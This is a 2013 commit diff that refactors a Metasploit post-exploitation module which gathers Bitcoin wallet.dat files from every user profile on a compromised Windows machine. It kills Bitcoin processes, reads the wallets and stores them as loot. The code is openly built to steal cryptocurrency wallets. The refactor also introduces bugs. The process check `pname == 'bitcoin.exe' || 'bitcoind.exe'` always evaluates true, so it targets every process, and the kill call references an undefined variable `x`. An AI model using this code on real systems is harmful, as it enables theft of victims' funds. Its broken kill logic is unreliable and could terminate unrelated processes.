Refactor for clearer syntax and variables

This was done on a barely configured Windows machine, so mind the tabs.
2013-12-29 10:15:48 -06:00 · 2013-12-29 10:15:48 -06:00 · 6fcd12e36c
parent ef73ca537f
commit 6fcd12e36c
1 changed files with 19 additions and 18 deletions
--- a/modules/post/windows/gather/bitcoin_jacker.rb
+++ b/modules/post/windows/gather/bitcoin_jacker.rb
@ -15,9 +15,10 @@ class Metasploit3 < Msf::Post

  def initialize(info={})
    super( update_info( info,
-      'Name'          => 'Windows Gather Bitcoin wallet.dat',
+      'Name'          => 'Windows Gather Bitcoin Wallet',
      'Description'   => %q{
-        This module downloads any Bitcoin wallet.dat files from the target system
+        This module downloads any Bitcoin Wallet files from the target
+				system.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'illwill <illwill[at]illmob.org>'],
@ -27,48 +28,48 @@ class Metasploit3 < Msf::Post
  end

  def run
-    print_status("Checking All Users For Bitcoin Wallet...")
+    print_status("Checking All Users For Bitcoin Wallets...")
    grab_user_profiles().each do |user|
      next unless user['AppData']
-      tmpath= user['AppData'] + "\\Bitcoin\\wallet.dat"
-      jack_wallet(tmpath)
+      bitcoin_wallet_path = user['AppData'] + "\\Bitcoin\\wallet.dat"
+			next unless file?(bitcoin_wallet_path)
+			jack_bitcoin_wallet(bitcoin_wallet_path)
    end
  end

-  def jack_wallet(filename)
-    data     = ""
-    return unless file?(filename)
+  def jack_bitcoin_wallet(wallet_path)
+		data = ""
+    print_status("Wallet found at #{wallet_path}")
+    print_status("Jackin' their wallet...")

-    print_status("Wallet Found At #{filename}")
-    print_status("Jackin their wallet...")
-
-    kill_bitcoin
+    kill_bitcoin # TODO: A little heavy-handed, determine when this should happen

    begin
-      data = read_file(filename) || ''
+      data = read_file(wallet_path) || ''
    rescue ::Exception => e
-      print_error("Failed to download #{filename}: #{e.class} #{e}")
+      print_error("Failed to download #{wallet_path}: #{e.class} #{e}")
      return
    end

    if data.empty?
      print_error("No data found")
    else
-      p = store_loot(
+      loot_result = store_loot(
        "bitcoin.wallet",
        "application/octet-stream",
        session,
        data,
-        filename,
+        wallet_path,
        "Bitcoin Wallet"
      )
-      print_status("Wallet Jacked: #{p.to_s}")
+      print_status("Wallet jacked: #{loot_result}")
    end
  end

  def kill_bitcoin
    client.sys.process.get_processes().each do |process|
-      if process['name'].downcase == "bitcoin.exe"
+			pname = process['name'].downcase
+			if pname == "bitcoin.exe" || "bitcoind.exe"
        print_status("#{process['name']} Process Found...")
        print_status("Killing Process ID #{process['pid']}...")
        session.sys.process.kill(x['pid']) rescue nil